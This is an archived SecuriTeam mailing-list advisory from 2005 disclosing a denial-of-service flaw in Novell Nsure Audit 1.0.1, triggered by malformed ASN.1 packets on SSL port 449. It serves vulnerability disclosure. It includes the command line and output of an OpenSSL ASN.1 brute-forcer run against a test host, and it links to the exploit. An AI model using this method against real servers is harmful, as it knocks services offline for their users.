[NT] Novell's Nsure SSL DoS (webadmin.exe)
From: SecuriTeam (support_at_securiteam.com)
Date: 04/25/05
- Previous message: SecuriTeam: "[TOOL] WebRoot - Web Server Brute Forcer"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 25 Apr 2005 15:13:09 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Novell's Nsure SSL DoS (webadmin.exe)
------------------------------------------------------------------------
SUMMARY
<http://www.novell.com/solutions/nsure/> Novell's Nsure product solution
"takes identity management to a whole new level. Combining award-winning
products, customer-driven services and committed business partnerships,
Novell Nsure gives you the power to control access so you can confidently
deliver the right resources to the right people securely, efficiently,
and best of all, affordably".
A vulnerability in Novell's Nsure product allows remote attackers to cause
the product to crash by sending it malformed ASN.1 packets via its SSL
listening port (449).
DETAILS
Vulnerable Systems:
* Novell Nsure Audit version 1.0.1
Immune Systems:
* Novell Nsure Audit version 1.0.2
* Novell Nsure Audit version 1.0.3
OpenSSL ASN.1 Parsing vulnerability:
Multiple vulnerabilities were reported in the ASN.1 parsing code in
OpenSSL. These issues could be exploited to cause a denial of service or
to execute arbitrary code. When using the exploit downloaded from here:
<http://www.securiteam.com/exploits/5OP0B2ABPM.html>
http://www.securiteam.com/exploits/5OP0B2ABPM.html
The server will stop responding.
Output from attack:
[***************** START **********************]
[root@localhost test]# ./a.out 192.168.1.4 449
OpenSSL ASN.1 brute forcer (Syzop/2003)
seed = 1135277150
.........................................................................................................................Unable to connect: Connection refused
DIFF:
Offset 71: 0xa -> 0xffffffe6
Offset 97: 0x6e -> 0x68
Offset 106: 0x6f -> 0xfffffff5
Offset 144: 0x32 -> 0xffffffcc
Offset 148: 0x30 -> 0x5b
Offset 154: 0x30 -> 0x2e
Offset 261: 0x6 -> 0x3a
Offset 563: 0x4e -> 0xffffffd1
Offset 583: 0x5c -> 0xffffffd8
Offset 629: 0xffffffa3 -> 0x67
Offset 718: 0xffffffa7 -> 0x41
Offset 719: 0xffffffa8 -> 0xffffffa5
Offset 770: 0x4d -> 0xffffffdf
Offset 773: 0xffffffae -> 0xffffffca
Offset 927: 0xffffff81 -> 0xffffffd5
***
[***************** STOP **********************]
At some points the exploit had to be run a few times, just stopped after
30 seconds and restarted.
ADDITIONAL INFORMATION
The information has been provided by <mailto:DennisRand@CIRT.DK> Dennis
Rand.
The original article can be found at:
<http://www.cirt.dk/advisories/cirt-31-advisory.pdf>
http://www.cirt.dk/advisories/cirt-31-advisory.pdf
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[TOOL] WebRoot - Web Server Brute Forcer"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
